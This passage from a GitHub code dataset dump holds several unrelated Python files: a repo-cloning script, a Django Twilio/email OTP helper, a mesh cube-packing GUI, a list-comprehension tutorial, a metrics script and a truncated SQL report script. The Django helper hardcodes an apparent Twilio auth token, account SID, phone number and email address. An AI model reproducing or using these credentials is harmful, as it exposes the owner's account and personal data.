73])\n","repo_name":"azhu51/leetcode-practice","sub_path":"daily/medium_739_daily_temperatures.py","file_name":"medium_739_daily_temperatures.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29279179852","text":"from dotenv import load_dotenv\nimport os\nfrom github import Github\n\nload_dotenv()\n\ng = Github(os.getenv(\"GITHUB_ACCESS_TOKEN\"))\nfolder_path = os.getenv(\"GITHUBREPOFOLDER\")\n\ndef get_list_of_downloaded_repos():\n return os.listdir(folder_path)\n\ndef get_list_of_github_repos():\n list_of_repos = []\n for repo in g.get_user().get_repos():\n list_of_repos.append(repo.name)\n return list_of_repos\n\ndef repos_that_need_to_be_cloned():\n repos_to_be_cloned = []\n for repo in get_list_of_github_repos():\n if repo not in get_list_of_downloaded_repos():\n repos_to_be_cloned.append(repo)\n return repos_to_be_cloned\n\ndef get_repos_urls():\n list_of_repos = []\n for repo in g.get_user().get_repos():\n if repo.name in repos_that_need_to_be_cloned():\n list_of_repos.append(repo.clone_url)\n return list_of_repos\n\ndef clone_needed_repos():\n for url in get_repos_urls():\n command_to_execute = 'cd ' + str(folder_path) + ' && git clone '+ str(url)\n print(\"\\n\\n\")\n print(command_to_execute)\n os.system(command_to_execute)\n\n\ndef test_functions():\n print(get_list_of_downloaded_repos())\n print(\"\\n\")\n print(get_list_of_github_repos())\n print(\"\\n\")\n print(repos_that_need_to_be_cloned())\n print(\"\\n\")\n print(get_repos_urls()) \n\nif __name__ == \"__main__\":\n #test_functions()\n clone_needed_repos()","repo_name":"Joe-Grey/Clone_All_Repos","sub_path":"clone_all_github_repos.py","file_name":"clone_all_github_repos.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23069481672","text":"import requests\nimport os\nimport random\nfrom twilio.rest import Client\nfrom smtplib import SMTPAuthenticationError\nfrom django.core.mail import send_mail\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\ndef send_wa_msg(s):\n account_sid = \"ACf692485845f83d3f27da8265b4bc6ad2\"\n auth_token = \"68392ba606eb7a4a67a39e407f8fb9d1\"\n client = Client(account_sid, auth_token)\n\n message = client.messages.create(from_=\"+13614507855\", body=s, to=\"+916353995184\")\n\n print(message.sid)\n\n\ndef generate_otp():\n return random.randint(100000, 999999)\n\n\ndef send_otp_email(email, otp):\n subject = \"OTP Verification\"\n message = f\"Your OTP is: {otp}\"\n from_email = \"samarthshinde247@gmail.com\"\n recipient_list = [email]\n try:\n send_mail(subject, message, from_email, recipient_list)\n except SMTPAuthenticationError:\n # Handle the authentication error here\n return Response(\n \"Failed to send email. SMTP authentication error.\",\n status=status.HTTP_500_INTERNAL_SERVER_ERROR,\n )\n\n\ndef send_reminder_email(contest, sender_email, recipient_email, eta=None):\n subject = f'CoCode Reminder: {contest[\"name\"]}'\n message = f\"\"\"\n
Reminder:\n    The contest {contest[\"name\"]} will start in 30 minutes.\n    Time: {contest['start_time']} - {contest['end_time']}
\n \"\"\"\n\n try:\n if eta is not None:\n send_mail(subject, message, sender_email, [recipient_email], eta=eta)\n else:\n send_mail(subject, message, sender_email, [recipient_email])\n\n except SMTPAuthenticationError:\n # Handle the authentication error here\n print(\"SMTP authentication error occurred.\")\n except Exception as e:\n # Print the exception and continue with other contests\n print(\"An error occurred while sending the reminder email.\", e)\n","repo_name":"samarth-shinde/CoCode_Backend","sub_path":"Backend/core/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8677559298","text":"import pyvista as pv\nimport sympy as sp\nfrom sympy import Matrix, lambdify\nimport numpy as np\nfrom PyQt5 import Qt, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\nfrom pyvistaqt import QtInteractor\nimport sys, os, time\nimport trimesh\n\n# initiate stored mesh\nmesh = pv.PolyData()\n\nclass MainWindow(Qt.QMainWindow):\n def __init__(self, parent=None, show=True):\n Qt.QMainWindow.__init__(self, parent)\n\n # create the frame\n self.frame = Qt.QFrame()\n vlayout = Qt.QVBoxLayout()\n\n # add the pyvista interactor object\n self.plotter = QtInteractor(self.frame)\n vlayout.addWidget(self.plotter.interactor)\n\n self.frame.setLayout(vlayout)\n self.setCentralWidget(self.frame)\n\n # simple menu\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('File')\n editMenu = mainMenu.addMenu('Edit')\n \n # opening a mesh file\n self.open_mesh_action = Qt.QAction('Open Mesh...', self)\n self.open_mesh_action.triggered.connect(self.open_mesh)\n fileMenu.addAction(self.open_mesh_action)\n \n # exit button\n exitButton = Qt.QAction('Exit', self)\n exitButton.setShortcut('Ctrl+Q')\n exitButton.triggered.connect(self.close)\n fileMenu.addAction(exitButton)\n\n # create cubic skeleton\n self.cubic_skeleton_action = Qt.QAction('Cubic Skeleton', self)\n self.cubic_skeleton_action.triggered.connect(self.cubic_skeleton)\n editMenu.addAction(self.cubic_skeleton_action)\n\n # split mesh based on max cube faces\n # self.max_cube_slice_action = Qt.QAction('Slice27', self)\n # self.cubic_skeleton_action.triggered.connect(self.max_cube_slice)\n # editMenu.addAction(self.max_cube_slice_action)\n \n if show:\n self.show()\n\n self.plotter.add_axes(interactive=None, line_width=2, color=None, x_color=None, y_color=None, z_color=None, xlabel='X', ylabel='Y', zlabel='Z', labels_off=False, box=None, box_args=None)\n\n def open_mesh(self):\n \"\"\" add a mesh to the pyqt frame \"\"\"\n global mesh, mesh_vol\n\n # open file\n file_info = QtWidgets.QFileDialog.getOpenFileName()\n print(file_info)\n file_path = file_info[0]\n \n # determine file type and if conversion needed\n file_dir, file_name = os.path.split(file_path)\n mesh_name, mesh_type = os.path.splitext(file_name)\n\n # convert mesh file type\n #if ext != \".vtk\" or ext != \".VTK\":\n # mesh = meshio.read(file_path)\n # meshio.write(root + \".vtk\", mesh)\n # mesh = pv.read(head + \"/\" + root + \".vtk\")\n # need to store elsewhere or delete .vtk file in the future\n #else:\n # mesh = pv.read(file_path)\n\n # read mesh & transform according to principal axes\n pre = trimesh.load_mesh(file_path)\n orient = pre.principal_inertia_transform\n pre = pre.apply_transform(orient)\n pre.export('data/'+ mesh_name + '_oriented.STL')\n mesh = pv.read('data/'+ mesh_name + '_oriented.STL')\n\n # print mesh info\n print(\"Mesh Name:\", 
mesh_name)\n print(\"Mesh Type:\", mesh_type[1:])\n\n # show transformed mesh\n #self.plotter.add_mesh(mesh, show_edges=True, color=\"w\", opacity=0.6)\n\n # reset plotter\n self.reset_plotter()\n\n # find mesh centroid and translate the mesh so that's the origin\n self.centroid()\n\n # show bounding box\n # self.plotter.add_bounding_box(opacity=0.5, color=\"y\")\n\n # mesh volume\n mesh_vol = float(format(mesh.volume, \".5f\"))\n print(\"Mesh Volume:\", mesh_vol)\n\n def reset_plotter(self):\n \"\"\" clear plotter of mesh or interactive options \"\"\"\n # clear plotter\n self.plotter.clear()\n #self.plotter.clear_plane_widgets()\n #self.plotter.reset_camera()\n \n # callback opened mesh\n self.plotter.add_mesh(mesh, show_edges=True, color=\"w\", opacity=0.6)\n \n # show origin\n self.plotter.add_axes_at_origin(xlabel='X', ylabel='Y', zlabel='Z', line_width=6, labels_off=True)\n \n def centroid(self):\n \"\"\" find centroid volumetrically and indicate on graph \"\"\"\n global Vol_centroid, V\n\n # find the vertices & the vertex indices of each triangular face\n V = np.array(mesh.points)\n col = len(V)\n f_ind = np.array(mesh.faces.reshape((-1,4))[:, 1:4])\n \n # define an arbitrary start point from middle of max and min of X,Y,Z of\n # all points: in a convex manifold it falls inside the volume (requires\n # segmentation for general application)\n start = np.array(mesh.center)\n X_start = start[0]\n Y_start = start[1]\n Z_start = start[2]\n \n # initialize variables\n centroids = []\n Vol_total = 0\n Sum_vol_x = 0\n Sum_vol_y = 0\n Sum_vol_z = 0\n \n # find centroid from all tetrahedra made with arbitrary center and triangular faces\n for i in range(0, col-1, 3): \n # find the center of each tetrahedron (average of X,Y,Z of \n # 4 vertices, 3 from the triangle, and one arbitrary start point)\n X_cent = (X_start + V[f_ind[i,0],0] + V[f_ind[i+1,0],0] + V[f_ind[i+2,0],0]) / 4\n Y_cent = (Y_start + V[f_ind[i,1],1] + V[f_ind[i+1,1],1] + V[f_ind[i+2,1],1]) / 4\n Z_cent = (Z_start + V[f_ind[i,2],2] + V[f_ind[i+1,2],2] + V[f_ind[i+2,2],2]) / 4\n \n # compute the volume of each tetrahedron\n V1 = np.array([V[f_ind[i,0],0], V[f_ind[i,1],1], V[f_ind[i,2],2]])**2 - np.array([X_start, Y_start, Z_start])**2\n V2 = np.array([V[f_ind[i+1,0],0], V[f_ind[i+1,1],1], V[f_ind[i+1,2],2]])**2 - np.array([V[f_ind[i,0],0], V[f_ind[i,1],1], V[f_ind[i,2],2]])**2\n V3 = np.array([V[f_ind[i+2,0],0], V[f_ind[i+2,1],1], V[f_ind[i+2,2],2]])**2 - np.array([V[f_ind[i+1,0],0], V[f_ind[i+1,1],1], V[f_ind[i+1,2],2]])**2\n V1 = V1.reshape((-1,1))\n V2 = V2.reshape((-1,1))\n V3 = V3.reshape((-1,1))\n Vol = abs(np.linalg.det(np.hstack([V1, V2, V3]))) / 6\n \n # tally up each cycle\n Vol_total = Vol_total + Vol\n Sum_vol_x = Sum_vol_x + Vol * X_cent\n Sum_vol_y = Sum_vol_y + Vol * Y_cent\n Sum_vol_z = Sum_vol_z + Vol * Z_cent\n centroids.append([X_cent,Y_cent,Z_cent])\n \n # find & show centroid\n centroids = np.asarray(centroids)\n Vol_centroid = [Sum_vol_x, Sum_vol_y, Sum_vol_z] / Vol_total\n \n def cubic_skeleton(self):\n ''' fill mesh with cubic skeleton'''\n global max_cube_stored\n \n max_cube_stored = 0\n\n # user input number of rays for next cubes\n # self.plotter.add_text_slider_widget(self.max_cube_ray, ['10 rays','15 rays', '20 rays'], value=0)\n self.plotter.add_text_slider_widget(self.next_cubes_ray, ['10 rays','15 rays', '20 rays'], value=1)\n \n def max_cube_ray(self, value):\n \"\"\" add a maximally inscribed cube within the opened mesh (via ray tracing) \"\"\"\n global x_range, y_range, z_range, Vol_centroid\n 
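# published as module-level state so next_cubes_ray and the slider callbacks can reuse the max-cube geometry\n        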
global face_center, max_normal, max_cube_vol, max_cube\n global max_cube_start, max_cube_end, max_cube_run\n global top_rays, top_ints, bottom_rays, bottom_ints\n\n # bypass error\n try:\n top_rays, top_ints, bottom_rays, bottom_ints, max_cube, r_num, max_cube_stored\n except NameError:\n top_rays = None\n top_ints = None\n bottom_rays = None\n bottom_ints = None\n max_cube = None\n max_cube_stored = None\n r_num = 0\n\n # remove old rays\n if (r_num != 0) and (r_num == int(value[0])):\n return\n elif (r_num != 0) and (max_cube_stored != None):\n self.plotter.remove_actor(max_cube_stored)\n for i in range(0, r_num):\n self.plotter.remove_actor(top_rays[i])\n self.plotter.remove_actor(top_ints[i])\n self.plotter.remove_actor(bottom_rays[i])\n self.plotter.remove_actor(bottom_ints[i])\n\n # track starting time\n max_cube_start = time.time()\n\n # find mesh vertices\n V = np.array(mesh.points)\n\n # find the max and min of x,y,z axes of mesh\n ranges = mesh.bounds\n x_range = abs(ranges[0] - ranges[1])\n y_range = abs(ranges[2] - ranges[3])\n z_range = abs(ranges[4] - ranges[5])\n\n # show centroid\n Vol_centroid = np.array([0,0,0]) # overwrite centroid with origin at principle axes\n self.plotter.add_mesh(pv.PolyData(Vol_centroid), color='r', point_size=20.0, render_points_as_spheres=True)\n\n # find the nearest possible cube vertex from top rays & mesh intersection\n top_vert, top_rays, top_ints = self.cube_center_ray(Vol_centroid, 'z', value)\n top = self.furthest_pt(top_vert, Vol_centroid)\n\n # find the nearest possible cube vertex from bottom rays & mesh intersection\n bottom_vert, bottom_rays, bottom_ints = self.cube_center_ray(Vol_centroid, '-z', value)\n bottom = self.furthest_pt(bottom_vert, Vol_centroid)\n\n # find the nearest possible cube vertex between the two\n if top[0] < bottom[0]:\n p = top[1]\n V = top[2]\n else:\n p = bottom[1]\n V = bottom[2]\n \n # create and show max cube\n max_cube_V, max_cube_F, max_cube_vol = self.create_cube(V[p,:], Vol_centroid, np.array([0,0,Vol_centroid[2]]))\n max_cube = self.plotter.add_mesh(pv.PolyData(max_cube_V, max_cube_F), show_edges=True, line_width=3, color=\"g\", opacity=0.6)\n max_cube_stored = max_cube\n\n # find & show max cube face centers\n cell_center = pv.PolyData(max_cube_V, max_cube_F).cell_centers()\n face_center = np.array(cell_center.points)\n #self.plotter.add_mesh(cell_center, color=\"r\", point_size=8, render_points_as_spheres=True)\n\n # find max cube face normals\n max_normal = pv.PolyData(max_cube_V, max_cube_F).cell_normals\n\n # max cube volume\n max_cube_vol = float(format(max_cube_vol, \".5f\"))\n print(\"Max Cube Volume:\", max_cube_vol)\n\n # track ending time & duration\n max_cube_end = time.time()\n max_cube_run = max_cube_end - max_cube_start\n\n return\n\n def cube_center_ray(self, start, dir, value):\n ''' from starting point shoot out n rays to find vertices of possible cubes '''\n global r_num, r_rot, r_dec\n\n # initialize variables\n idx = value.index(\" \")\n r_num = 0\n for i in range(0, idx):\n r_num = r_num + int(value[i]) + (idx - i)**10\n r_rot = np.pi/2\n r_dec = -2*np.pi/r_num\n l_wid = 5\n pt_size = 20\n ray_size = np.zeros((4, 3))\n r_dir = ray_size\n r_dir_norm = ray_size\n r_end = ray_size\n rays = [0] * r_num\n ints = [0] * r_num\n r_int = []\n ori_r_int = []\n\n # set ray length\n r_len = np.sqrt((x_range/2)**2 + (y_range/2)**2 + (z_range/2)**2)\n \n # create rays by rotating the first, which creates the cube with xyz axes as its face normals\n for i in range(0, r_num):\n for j in range(0, 
4):\n                if (j == 0) and (dir == 'z'):\n                    r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * i), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * i), 0.5])\n                    r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n                    r_end[0] = Vol_centroid + r_dir_norm[0] * r_len\n                    # set rotation matrix about 'z'\n                    R = self.rot_axis(np.array([0,0,1]))\n                elif (j == 0) and (dir == '-z'):\n                    r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * i), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * i), -0.5])\n                    r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n                    r_end[0] = Vol_centroid + r_dir_norm[0] * r_len\n                    # set rotation matrix about '-z'\n                    R = self.rot_axis(np.array([0,0,-1]))\n                else:\n                    r_end[j] = np.dot(R(j*r_rot), (r_end[0]-Vol_centroid).T).T\n                    r_end[j] = r_end[j] + Vol_centroid\n\n                # perform ray trace\n                r_pts, r_ind = mesh.ray_trace(Vol_centroid, r_end[j])\n\n                # show rays\n                # rays[j] = self.plotter.add_mesh(pv.Line(Vol_centroid, r_end[j]), color='w', line_width=l_wid)\n                # ints[j] = self.plotter.add_mesh(pv.PolyData(r_pts[0]), color='w', point_size=pt_size)\n\n                # create an array of ray intersections\n                r_int = np.append(r_int, r_pts[0])\n            \n            r_int = np.reshape(r_int, (4,3))\n            ori_nearest, ori_p, ori_V = self.nearest_pt(r_int, Vol_centroid)\n            r_int = []\n            ori_r_int = np.append(ori_r_int, ori_V[ori_p,:])\n\n        ori_r_int = np.reshape(ori_r_int, (r_num,3))\n        return ori_r_int, rays, ints\n\n    def nearest_pt(self, vert, starting_pt):\n        \"\"\" find nearest vertex: for segmented convex manifold, a cube with volume centroid as \n        center and nearest vertex as cube vertex, it falls inside the volume \"\"\"\n        # find nearest point from the list of points\n        c = len(vert)\n        dist = np.zeros(c)\n        for i in range(0, c):\n            dist[i] = np.sqrt((vert[i,0] - starting_pt[0])**2 + (vert[i,1] - starting_pt[1])**2\n                            + (vert[i,2] - starting_pt[2])**2)\n        \n        # find index of the nearest point\n        nearest = min(dist)\n        p = np.where(dist == nearest)\n        p = p[0].item()\n\n        return nearest, p, vert\n\n    def furthest_pt(self, vert, starting_pt):\n        global p, furthest, dist\n        \"\"\" find furthest vertex among the list of nearest vertices \"\"\"\n        # find furthest point from the list of points\n        c = len(vert)\n        dist = np.zeros(c)\n        for i in range(0, c):\n            dist[i] = np.sqrt((vert[i,0] - starting_pt[0])**2 + (vert[i,1] - starting_pt[1])**2\n                            + (vert[i,2] - starting_pt[2])**2)\n\n        # find index of the furthest point\n        furthest = max(dist)\n        p = np.where(dist == furthest)\n        p = p[0][0]\n\n        return furthest, p, vert\n\n    def create_cube(self, vertex, starting_pt, axis):\n        ''' create cube from the nearest pt & centroid '''\n        if (axis[0] == 0) and (axis[1] == 0) and (axis[2] == 0):\n            axis[2] = 1\n            vert_trans = np.array([0,0,0])\n        elif (starting_pt[0] == 0) and (starting_pt[1] == 0) and (starting_pt[2] == 0):\n            vert_trans = np.array([0,0,0])\n        else:\n            vert_trans = starting_pt\n            for i in range(0,3):\n                if round(axis[i]) == 1 or round(axis[i]) == -1:\n                    vert_trans[i] = 0  # zero out the component along the cube axis (was a no-op '==' comparison)\n        # find the other 7 vertices\n        # 3 vertices can be found by rotating the first point 90 degrees 3 times around Z axis of centroid\n        # 4 vertices can be found by translating the first four vertices twice the half edge\n        # found from the distance times sin(pi/4)\n        R = self.rot_axis(axis / np.linalg.norm(axis))\n        \n        # construct the array of the first 4 vertices\n        V_1 = np.array(vertex - vert_trans)\n        V_2 = np.dot(R(np.pi/2), V_1.T).T\n        V_3 = np.dot(R(np.pi), V_1.T).T\n        V_4 = np.dot(R(3*np.pi/2), V_1.T).T\n        # cube_V_start = np.array([V_1, V_2, V_3, V_4])\n        cube_V_start = np.array([V_1, V_2, V_3, V_4]) + 
np.ones((4,1)) * [vert_trans]\n cube_V_start_center = np.array(pv.PolyData(cube_V_start).center)\n\n # show nearest vertex of cube\n V_1 = np.array(vertex)\n self.plotter.add_mesh(pv.PolyData(V_1), color=\"y\", point_size=30.0, render_points_as_spheres=True)\n \n # find the translation distance\n trans_dis = starting_pt - cube_V_start_center\n trans_dir = trans_dis / np.linalg.norm(trans_dis)\n dia_dis = np.sqrt((V_1[0]-cube_V_start_center[0])**2 + (V_1[1]-cube_V_start_center[1])**2 + (V_1[2]-cube_V_start_center[2])**2)\n half_edge = np.ones((4,1)) * [trans_dir] * dia_dis * np.sin(np.pi/4)\n cube_trans = np.asarray(2*half_edge, dtype=np.float64)\n\n # construct the cube\n cube_V_end = np.add(cube_V_start, cube_trans)\n cube_V = np.vstack((cube_V_start, cube_V_end))\n cube_F = np.hstack([[4,0,1,2,3],\n [4,0,3,7,4],\n [4,0,1,5,4],\n [4,1,2,6,5],\n [4,2,3,7,6],\n [4,4,5,6,7]])\n\n # cube volume\n cube_vol = (2 * np.linalg.norm(half_edge[0,:]))**3\n\n return cube_V, cube_F, cube_vol\n\n def rot_axis(self, axis):\n ''' create a rotational matrix about an arbitrary axis '''\n t = sp.Symbol('t')\n\n R_t = Matrix([[sp.cos(t)+axis[0]**2*(1-sp.cos(t)), axis[0]*axis[1]*(1-sp.cos(t))-axis[2]*sp.sin(t), axis[0]*axis[2]*(1-sp.cos(t))+axis[1]*sp.sin(t)],\n [axis[1]*axis[0]*(1-sp.cos(t))+axis[2]*sp.sin(t), sp.cos(t)+axis[1]**2*(1-sp.cos(t)), axis[1]*axis[2]*(1-sp.cos(t))-axis[0]*sp.sin(t)],\n [axis[2]*axis[0]*(1-sp.cos(t))-axis[1]*sp.sin(t), axis[2]*axis[1]*(1-sp.cos(t))+axis[0]*sp.sin(t), sp.cos(t)+axis[2]**2*(1-sp.cos(t))]])\n R = lambdify(t, R_t)\n return R\n\n def next_cubes_ray(self, value):\n ''' create cubes within the mesh from the face centers of the first cube'''\n global next_cube_vol, max_normal\n global next_rays, next_ints, next_cubes\n\n # find max cube\n self.max_cube_ray(value)\n\n # # bypass error\n # try:\n # next_rays, next_ints, next_cubes, r_num\n # except NameError:\n # next_rays = None\n # next_ints = None\n # next_cubes = None\n # r_num = 0\n\n # # remove old rays\n # if (r_num != 0) and (r_num == int(value[0])):\n # return\n # elif (r_num != 0) and (next_cubes != None):\n # for i in range(0,6):\n # self.plotter.remove_actor(next_cubes[i])\n # for j in range(0, r_num):\n # self.plotter.remove_actor(next_rays[i*r_num+j])\n # self.plotter.remove_actor(next_ints[i*r_num+j])\n\n # track starting time\n next_cube_start = time.time()\n\n # initiate variables\n next_cube_vol_sum = 0\n next_cubes = [0] * 6\n next_rays = [0] * 6 * r_num\n next_ints = [0] * 6 * r_num\n \n # fix max_normal\n normal = face_center[0] - Vol_centroid\n if (np.sign(normal[2]) != np.sign(max_normal[0,2])):\n max_normal = np.negative(max_normal)\n\n # loop through all 6 faces of max cube\n for i in range(0, 6):\n # create rotaional matrix about max cube normals\n R = self.rot_axis(max_normal[i])\n\n # initialize variables\n ray_size = np.zeros((4, 3))\n r_dir = ray_size\n r_dir_norm = ray_size\n r_end = ray_size\n\n # initialize ray trace parameters\n l_wid = 3\n pt_size = 10\n r_len = np.sqrt((x_range/2)**2 + (y_range/2)**2 + (z_range/2)**2)\n r_int = []\n ori_r_int = []\n \n for j in range(0, r_num):\n for k in range(0, 4):\n if k == 0:\n if (i == 0) or (i == 5):\n r_dir[0] = np.array([np.sqrt(2)/2 * np.cos(np.pi/4 + r_dec * j), np.sqrt(2)/2 * np.sin(np.pi/4 + r_dec * j), max_normal[i][2]])\n else:\n x,y = sp.symbols('x,y')\n f = sp.Eq(max_normal[i][0]*x + max_normal[i][1]*y, 0)\n g = sp.Eq(x**2 + y**2, 0.5**2)\n inc = sp.solve([f,g],(x,y))\n r_dir[0] = np.array(max_normal[i] + [inc[0][0], inc[0][1], 0.5])\n 
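# normalize the seed ray, stretch it past the mesh bounds, then rotate copies of it around the face normal\n                        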
r_dir_norm[0] = r_dir[0] / np.linalg.norm(r_dir[0])\n r_end[0] = face_center[i] + r_dir_norm[0] * r_len\n r_end[0] = np.dot(R(j*r_dec), (r_end[0]-Vol_centroid).T).T\n else:\n r_end[k] = np.dot(R(k*r_rot), (r_end[0]-Vol_centroid).T).T\n r_end[k] = r_end[k] + Vol_centroid\n\n # perform ray trace\n r_pts, r_ind = mesh.ray_trace(face_center[i], r_end[k])\n\n # show rays\n # next_rays[i*r_num+k] = self.plotter.add_mesh(pv.Line(face_center[i], r_end[k]), color='w', line_width=l_wid)\n # next_ints[i*r_num+k] = self.plotter.add_mesh(pv.PolyData(r_pts[0]), color='w', point_size=pt_size)\n\n # create an array of ray intersections\n r_int = np.append(r_int, r_pts[0])\n\n # find nearest vertice among the ray intersections\n r_int = np.reshape(r_int, (4,3))\n ori_nearest, ori_p, ori_V = self.nearest_pt(r_int, face_center[i])\n r_int = []\n ori_r_int = np.append(ori_r_int, ori_V[ori_p,:])\n\n ori_r_int = np.reshape(ori_r_int, (r_num,3))\n face = self.furthest_pt(ori_r_int, face_center[i])\n\n # create cube from nearest vertice\n next_cube_V, next_cube_F, next_cube_vol = self.create_cube(face[2][face[1],:], face_center[i], max_normal[i])\n next_cubes[i] = self.plotter.add_mesh(pv.PolyData(next_cube_V, next_cube_F), show_edges=True, line_width=3, color=\"g\", opacity=0.6)\n\n # next cube volume\n next_cube_vol_sum = next_cube_vol_sum + next_cube_vol\n\n # show packing efficiency\n next_cube_vol_sum = float(format(next_cube_vol_sum, \".5f\"))\n pack_vol = float(format((max_cube_vol + next_cube_vol_sum), \".5f\"))\n pack_percent = \"{:.1%}\".format(pack_vol / mesh_vol)\n print(\"Next Cubes Volume:\", next_cube_vol_sum)\n print(\"Packed Volume:\", pack_vol)\n print(\"Packing Efficiency:\", pack_percent)\n\n # track starting time\n next_cube_end = time.time()\n next_cube_run = next_cube_end - next_cube_start\n print(\"Total elapsed run time: %g seconds\" % (max_cube_run + next_cube_run))\n\n return\n \n def closeEvent(self, event):\n reply = QMessageBox.question(self, \"Window Close\", \"Are you sure you want to quit program?\",\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n \nif __name__ == '__main__':\n app = Qt.QApplication(sys.argv)\n window = MainWindow()\n window.show()\n window.setWindowTitle(\"Mesh Visualization\")\n QtWidgets.QApplication.setQuitOnLastWindowClosed(True)\n sys.exit(app.exec_())","repo_name":"bluejgw/Cube-Shell","sub_path":"Mesh_Gui_Lite.py","file_name":"Mesh_Gui_Lite.py","file_ext":"py","file_size_in_byte":23202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21472202778","text":"# #For ve while döngüsüne alternatif\n# numbers= []\n# for x in range(10):\n\n# numbers.append(x)\n# print(numbers)\n\n# numbers=[x for x in range(10)]\n# print(numbers) \n\n# numbers = [x*x for x in range(10) if x%3==0]\n# print(numbers)\n\n# MyString=\"Hello\"\n# mylist=[]\n\n# for letter in MyString:\n# mylist.append(letter)\n\n# mylist=[letter for letter in MyString]\n\n# print(mylist)\n\n# years=[1998,1999,2000,2001,2002,2003]\n# ages=[2022-year for year in years]\n# # yapmak istenen işlem-> döngü devamı\n# print(ages)\n\n\n\n\n# result=[x if x%2==0 else \"tek\" for x in range(5,100,5)]\n# print(result)\n\n# deneme=[a if a%3==0 else \"3e bölünemez\" for a in range(1,10)]\n# print(deneme)\n\n#bir şekilde atama yapılmaktadır\nresult =[]\n\nfor x in range(4):\n for y in range(3):\n result.append((x,y))\n print(x,y) \n#yukarıdaki örneğin farklı bir tür örneği 
\n \n","repo_name":"Fayikk/Work_To_Python","sub_path":"List_Comprehensions.py","file_name":"List_Comprehensions.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4693577838","text":"# coding: utf-8\n\nimport os\n\nimport supervisely_lib as sly\nfrom supervisely_lib.metric.classification_metrics import ClassificationMetrics\nfrom supervisely_lib.metric.common import check_tag_mapping, TAGS_MAPPING, CONFIDENCE_THRESHOLD\nfrom supervisely_lib.io.json import load_json_file\n\n\ndef main():\n    settings = load_json_file(sly.TaskPaths.TASK_CONFIG_PATH)\n    sly.logger.info('Input settings:', extra={'config': settings})\n\n    metric = ClassificationMetrics(settings[TAGS_MAPPING], settings[CONFIDENCE_THRESHOLD])\n    applier = sly.MetricProjectsApplier(metric, settings)\n    check_tag_mapping(applier.project_gt, applier.project_pred, settings[TAGS_MAPPING])\n    applier.run_evaluation()\n    metric.log_total_metrics()\n\n\nif __name__ == '__main__':\n    if os.getenv('DEBUG_LOG_TO_FILE', None):\n        sly.add_default_logging_into_file(sly.logger, sly.TaskPaths.DEBUG_DIR)\n    sly.main_wrapper('METRIC_EVALUATION', main)\n","repo_name":"juzisedefeimao/supervisely","sub_path":"plugins/metrics/classification_metrics/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18975199515","text":"from pathlib import Path\nfrom typing import Dict, List\nfrom tools.file_handling.collect import (\n    CorespondingFiles,\n    get_record_annoation_tupels_from_directory,\n)\nfrom pandas import read_csv, concat, DataFrame\nimport csv\nfrom tools.configuration import parse_config\n\nfrom mysql.connector.cursor import MySQLCursor\nfrom tools.logging import info\nfrom tools.db import (\n    get_entry_id_or_create_it,\n    connectToDB,\n)\nfrom numpy import median\n\nDATA_PATH = Path(\"libro_animalis/data/TD_Training\")\nREPORT_PATH = Path(\"./\")\nCONFIG_FILE_PATH = Path(\"libro_animalis/import_scripts/defaultConfig.cfg\")\nRECORD_MERGE_STRATEGY = \"replace\"\n\nQUERY_RECORD_COUNT = \"\"\"\n    SELECT COUNT(*) FROM libro_animalis.record where collection_id = {collection_id}\n    \"\"\"\nQUERY_RECORD_DURATION = \"\"\"\n    SELECT sum(r.duration) as duration FROM record AS r\n    WHERE r.collection_id = {collection_id}\n    \"\"\"\n\nQUERY_ID_LEVEL_COUNT = \"\"\"\n    SELECT\n    latin_name,olaf8_id,german_name,english_name, COUNT(*) AS id_level\n    FROM (annotation_of_species AS a)\n    LEFT JOIN (record AS r) ON r.id = a.record_id\n    LEFT JOIN species AS s ON s.id = a.species_id\n    WHERE r.collection_id = {collection_id} and a.id_level = {id_level}\n    GROUP BY a.species_id\n    order by `id_level` DESC\n    \"\"\"\n\nQUERY_VOCALIZATIOM_TYPE_COUNT = \"\"\"\n    SELECT\n    latin_name,olaf8_id,german_name,english_name, vocalization_type, COUNT(*) AS count\n    FROM (annotation_of_species AS a)\n    LEFT JOIN (record AS r) ON r.id = a.record_id\n    LEFT JOIN species AS s ON s.id = a.species_id\n    WHERE r.collection_id = {collection_id} and a.id_level = {id_level} \n    GROUP BY a.species_id, a.vocalization_type\n    order by `latin_name`,vocalization_type DESC\n    \"\"\"\nQUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS = \"\"\"\n    SELECT SUM(a.end_time - a.start_time) AS duration\n    FROM libro_animalis.annotation_of_species AS a\n    LEFT JOIN (record AS r) ON r.id = a.record_id\n    WHERE r.collection_id = {collection_id} AND 
